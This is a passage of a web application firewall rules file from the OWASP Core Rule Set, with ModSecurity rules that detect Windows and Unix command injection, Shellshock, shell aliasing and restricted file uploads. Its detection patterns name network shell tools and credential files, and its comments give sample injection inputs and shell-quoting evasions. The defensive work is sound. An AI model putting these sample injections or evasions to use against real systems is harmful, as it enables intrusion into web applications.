define | ERRORLEVEL n | CMDEXTVERSION n +# IF [/I] [NOT] item1 [==|EQU|NEQ|LSS|LEQ|GTR|GEQ] item2 +# IF [/I] [NOT] (item1) [==|EQU|NEQ|LSS|LEQ|GTR|GEQ] (item2) +# +# http://ss64.com/nt/if.html +# http://ss64.com/nt/for.html +# +# Regular expression generated from regex-assembly/932140.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932140 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \b(?:for(?:/[dflr].*)? %+[^ ]+ in\(.*\)[\s\v]?do|if(?:/i)?(?: not)?(?: (?:e(?:xist|rrorlevel)|defined|cmdextversion)\b|[ \(].*(?:\b(?:g(?:eq|tr)|equ|neq|l(?:eq|ss))\b|==)))" \ + "id:932140,\ + phase:2,\ + block,\ + capture,\ + t:none,t:cmdLine,\ + msg:'Remote Command Execution: Windows FOR/IF Command Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-windows',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# [ Unix direct remote command execution ] +# +# Detects Unix commands at the start of a parameter (direct RCE). +# Example: foo=wget%20www.example.com +# +# In this rule we use a different check from command injection (rule 932230), where a +# command string is appended (injected) to a regular parameter, and then +# passed to a shell unescaped. +# +# Additionaly, we require a trailing space (denoting command parameters) or command +# separator character after the command. +# +# This rule is also triggered by an Oracle WebLogic Remote Command Execution exploit: +# [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ] +# +# An effort was made to combat evasions by shell quoting (e.g. 'ls', +# 'l'"s", \l\s are all valid). ModSecurity has a t:cmdLine +# transformation built-in to deal with this, but unfortunately, it +# replaces ';' characters and lowercases the payload, which is less +# useful for this case. However, emulating the transformation makes +# the regexp more complex. +# +# This is the base Rule to prevent Direct Unix Command Injection +# without prefix match. +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932250.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932250 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|=)[\s\v]*(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[arx])?|(?:b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|x)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|[ckz][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?f|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)|f[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[dg]|g[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?g)|(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b|l[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:s|z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?4)?)|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z)|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)?|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|(?:s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?h|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n)|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?3[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m)[\s\v&\)<>\|]" \ + "id:932250,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Direct Unix Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# [ Unix command injection ] +# +# This rule complements rule 932250 for commands of 4 characters and up. +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932260.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932260 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|=)[\s\v]*(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:a(?:ddgroup|xel)|b(?:ase(?:32|64|nc)|lkid|sd(?:cat|iff|tar)|u(?:iltin|nzip2|sybox)|yobu|z(?:c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more))|c(?:h(?:g(?:passwd|rp)|pass|sh)|lang\+\+|o(?:mm[\s\v&\)<>\|]|proc)|ron)|d(?:iff[\s\v&\)<>\|]|mesg|oas)|e(?:2fsck|grep)|f(?:grep|iletest|tp(?:stats|who))|g(?:r(?:ep[\s\v&\)<>\|]|oupmod)|unzip|z(?:cat|exe|ip))|htop|l(?:ast(?:comm|log(?:in)?)|ess(?:echo|(?:fil|pip)e)|ftp(?:get)?|osetup|s(?:-F|b_release|cpu|mod|of|pci|usb)|wp-download|z(?:4c(?:at)?|c(?:at|mp)|diff|[e-f]?grep|less|m(?:a(?:dec|info)?|ore)))|m(?:a(?:ilq|ster\.passwd)|k(?:fifo|nod|temp)|locate|ysql(?:admin|dump(?:slow)?|hotcopy|show))|n(?:c(?:\.(?:openbsd|traditional)|at)|et(?:(?:c|st)at|kit-ftp|plan)|ohup|ping|stat)|onintr|p(?:dksh|erl5?|(?:ft|gre)p|hp(?:-cgi|[57])|igz|k(?:exec|ill)|(?:op|se)d|rint(?:env|f[\s\v&\)<>\|])|tar(?:diff|grep)?|wd\.db|ython[2-3])|r(?:(?:bas|ealpat)h|m(?:dir[\s\v&\)<>\|]|user)|nano|sync)|s(?:diff|e(?:ndmail|t(?:env|sid))|ftp|(?:h\.distri|pwd\.d)b|ocat|td(?:err|in|out)|udo|ysctl)|t(?:ailf|c(?:p(?:ing|traceroute)|sh)|elnet|imeout[\s\v&\)<>\|]|raceroute6?)|u(?:n(?:ame|lz(?:4|ma)|(?:pig|x)z|rar|zstd)|ser(?:(?:ad|mo)d|del))|vi(?:gr|pw)|w(?:get|hoami)|x(?:args|z(?:c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more))|z(?:c(?:at|mp)|diff|[e-f]?grep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|less|more|run|std(?:(?:ca|m)t|grep|less)?))" \ + "id:932260,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Direct Unix Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{TX.932260_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.932260_matched_var_name=%{matched_var_name}',\ + chain" + SecRule MATCHED_VAR "!@rx [0-9]\s*\'\s*[0-9]" \ + "t:none,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# [ Unix shell history invocation ] +# +# Detects Unix shell history invocations in any context. +# +# Example: +# GET /?rce=example.com +# GET /?rce=curl%20 +# GET /?rce=!-1!-2 +# +# Will execute `curl example.com`. We should be able to detect the '!-' sequence with a very low risk of false-positives since the sequence is very specific +# and does not allow for whitespaces in between. +# +# This rule has stricter siblings: +# * 932331 (PL3) +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx !-\d" \ + "id:932330,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix shell history invocation',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# [ Unix shell snippets ] +# +# Detect some common sequences found in shell commands and scripts. +# +# Some commands which were restricted in earlier rules due to FP, +# have been added here with their full path, in order to catch some +# cases where the full path is sent. +# +# Rule relations: +# +# .932160 (base rule, PL1, unix shell commands with full path) +# ..932161 (stricter sibling, PL2, unix shell commands with full path in User-Agent and Referer request headers) +# +# This rule is also triggered by an Apache Struts Remote Code Execution exploit: +# [ Apache Struts vulnerability CVE-2017-9805 - Exploit tested: https://www.exploit-db.com/exploits/42627 ] +# +# This rule is also triggered by an Oracle WebLogic Remote Command Execution exploit: +# [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ] + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile unix-shell.data" \ + "id:932160,\ + phase:2,\ + block,\ + capture,\ + t:none,t:cmdLine,t:normalizePath,\ + msg:'Remote Command Execution: Unix Shell Code Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# [ Shellshock vulnerability (CVE-2014-6271 and CVE-2014-7169) ] +# +# Detect exploitation of "Shellshock" GNU Bash RCE vulnerability. +# +# Based on ModSecurity rules created by Red Hat. +# Permission for use was granted by Martin Prpic +# +# https://access.redhat.com/articles/1212303 +# +SecRule REQUEST_HEADERS|REQUEST_LINE "@rx ^\(\s*\)\s+{" \ + "id:932170,\ + phase:1,\ + block,\ + capture,\ + t:none,t:urlDecode,\ + msg:'Remote Command Execution: Shellshock (CVE-2014-6271)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +SecRule ARGS_NAMES|ARGS|FILES_NAMES "@rx ^\(\s*\)\s+{" \ + "id:932171,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecode,t:urlDecodeUni,\ + msg:'Remote Command Execution: Shellshock (CVE-2014-6271)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# [ Unix shell alias detection ] +# +# Detects Unix shell alias invocations in any context. +# +# Example: +# GET /?rce=alias%20a=b +# +# Shell aliasing can be performed to substitute anything in commands, escaping +# +# References: https://pubs.opengroup.org/onlinepubs/007904975/basedefs/xbd_chap03.html#tag_03_10 : +# "In the shell command language, a word consisting solely of underscores, digits, and alphabetics +# from the portable character set and any of the following characters: '!', '%', ',', '@'." +# +# Implementations may allow other characters within alias names as an extension. +# +# Regular expression generated from regex-assembly/932175.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932175 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \ba[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s\b[\s\v]+[!-\"%',0-9@-Z_a-z]+=[^\s\v]" \ + "id:932175,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix shell alias invocation',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# -=[ Restricted File Upload ]=- +# +# Detects attempts to upload a file with a forbidden filename. +# +# Many application contain Unrestricted File Upload vulnerabilities. +# https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload +# +# These might be abused to upload configuration files or other files +# that affect the behavior of the web server, possibly causing remote +# code execution. +# +SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X-File-Name \ + "@pmFromFile restricted-upload.data" \ + "id:932180,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Restricted File Upload Attempt',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# [ Windows command injection ] +# +# This rule detects Windows shell command injections. +# If you are not running Windows, it is safe to disable this rule. +# +# New in CRSv4: The rules 932110 and 932115 were reorganized and renumbered to 932370 and 932380. +# The new rules target specific Windows binaries to simplify future updates of the command list. +# +# A command injection takes a form such as: +# +# foo.jpg&ver /r +# foo.jpg|ver /r +# +# The vulnerability exists when an application executes a shell command +# without proper input escaping/validation. +# +# To prevent false positives, we look for a 'starting sequence' that +# precedes a command in CMD syntax, such as: ; | & ` +# +# Anatomy of the regexp: +# +# 1. Starting tokens +# +# ; ;cmd +# \{ {cmd +# \| |cmd +# \|\| ||cmd +# & &cmd +# && &&cmd +# \n \ncmd +# \r \rcmd +# ` `cmd +# +# 2. Command prefixes +# +# ( (cmd) +# , ,cmd +# @ @cmd +# ' 'cmd' +# " "cmd" +# \s spacing+cmd +# +# 3. Paths +# +# [\w'\"\./]+/ /path/cmd +# [\x5c'\"\^]*\w[\x5c'\"\^]*:.*\x5c C:\Program Files\cmd +# [\^\.\w '\"/\x5c]*\x5c)?[\"\^]* \\net\share\dir\cmd +# +# 4. Quoting +# +# \" "cmd" +# \^ ^cmd +# +# 5. Extension/switches +# +# \.[\"\^]*\w+ cmd.com, cmd.exe, etc. +# /b cmd/h +# +# An effort is made to combat evasions by CMD syntax; for example, +# the following strings are valid: c^md, @cmd, "c"md. ModSecurity +# has a t:cmdLine transformation built-in to deal with some of these, +# but unfortunately, that transformation replaces ';' characters (so +# we cannot match on the start of a command) and '\' characters (so we +# have trouble matching paths). This makes the regexp more complex. +# +# This rule is case-insensitive. +# +# Regular expression generated from regex-assembly/932370.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932370 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:t[\"\^]*i[\"\^]*m[\"\^]*e|[\n\r;`\{]|\|\|?|&&?)[\s\v]*[\s\v\"'-\(,@]*(?:[\"'\.-9A-Z_a-z]+/|(?:[\"'\x5c\^]*[0-9A-Z_a-z][\"'\x5c\^]*:.*|[ \"'\.-9A-Z\x5c\^-_a-z]*)\x5c)?[\"\^]*(?:a[\"\^]*(?:c[\"\^]*c[\"\^]*c[\"\^]*h[\"\^]*e[\"\^]*c[\"\^]*k[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*s[\"\^]*o[\"\^]*l[\"\^]*e|d[\"\^]*(?:p[\"\^]*l[\"\^]*u[\"\^]*s|v[\"\^]*p[\"\^]*a[\"\^]*c[\"\^]*k)|(?:g[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*e[\"\^]*x[\"\^]*e[\"\^]*c[\"\^]*u[\"\^]*t[\"\^]*o|s[\"\^]*p[\"\^]*n[\"\^]*e[\"\^]*t[\"\^]*_[\"\^]*c[\"\^]*o[\"\^]*m[\"\^]*p[\"\^]*i[\"\^]*l[\"\^]*e)[\"\^]*r|p[\"\^]*p[\"\^]*(?:i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*l[\"\^]*l[\"\^]*e[\"\^]*r|v[\"\^]*l[\"\^]*p)|t[\"\^]*(?:[\s\v,\.-/;-<>].*|b[\"\^]*r[\"\^]*o[\"\^]*k[\"\^]*e[\"\^]*r))|b[\"\^]*(?:a[\"\^]*s[\"\^]*h|g[\"\^]*i[\"\^]*n[\"\^]*f[\"\^]*o|i[\"\^]*t[\"\^]*s[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n)|c[\"\^]*(?:d[\"\^]*b|e[\"\^]*r[\"\^]*t[\"\^]*(?:o[\"\^]*c|r[\"\^]*e[\"\^]*q|u[\"\^]*t[\"\^]*i[\"\^]*l)|l[\"\^]*_[\"\^]*(?:i[\"\^]*n[\"\^]*v[\"\^]*o[\"\^]*c[\"\^]*a[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n|l[\"\^]*o[\"\^]*a[\"\^]*d[\"\^]*a[\"\^]*s[\"\^]*s[\"\^]*e[\"\^]*m[\"\^]*b[\"\^]*l[\"\^]*y|m[\"\^]*u[\"\^]*t[\"\^]*e[\"\^]*x[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*i[\"\^]*f[\"\^]*i[\"\^]*e[\"\^]*r[\"\^]*s)|m[\"\^]*(?:d(?:[\"\^]*(?:k[\"\^]*e[\"\^]*y|l[\"\^]*3[\"\^]*2))?|s[\"\^]*t[\"\^]*p)|o[\"\^]*(?:m[\"\^]*s[\"\^]*v[\"\^]*c[\"\^]*s|n[\"\^]*(?:f[\"\^]*i[\"\^]*g[\"\^]*s[\"\^]*e[\"\^]*c[\"\^]*u[\"\^]*r[\"\^]*i[\"\^]*t[\"\^]*y[\"\^]*p[\"\^]*o[\"\^]*l[\"\^]*i[\"\^]*c[\"\^]*y|h[\"\^]*o[\"\^]*s[\"\^]*t|t[\"\^]*r[\"\^]*o[\"\^]*l)|r[\"\^]*e[\"\^]*g[\"\^]*e[\"\^]*n)|r[\"\^]*e[\"\^]*a[\"\^]*t[\"\^]*e[\"\^]*d[\"\^]*u[\"\^]*m[\"\^]*p|s[\"\^]*(?:c(?:[\"\^]*r[\"\^]*i[\"\^]*p[\"\^]*t)?|i)|u[\"\^]*s[\"\^]*t[\"\^]*o[\"\^]*m[\"\^]*s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l[\"\^]*h[\"\^]*o[\"\^]*s[\"\^]*t)|d[\"\^]*(?:a[\"\^]*t[\"\^]*a[\"\^]*s[\"\^]*v[\"\^]*c[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|e[\"\^]*(?:f[\"\^]*a[\"\^]*u[\"\^]*l[\"\^]*t[\"\^]*p[\"\^]*a[\"\^]*c[\"\^]*k|s[\"\^]*k(?:[\"\^]*t[\"\^]*o[\"\^]*p[\"\^]*i[\"\^]*m[\"\^]*g[\"\^]*d[\"\^]*o[\"\^]*w[\"\^]*n[\"\^]*l[\"\^]*d[\"\^]*r)?|v[\"\^]*(?:i[\"\^]*c[\"\^]*e[\"\^]*c[\"\^]*r[\"\^]*e[\"\^]*d[\"\^]*e[\"\^]*n[\"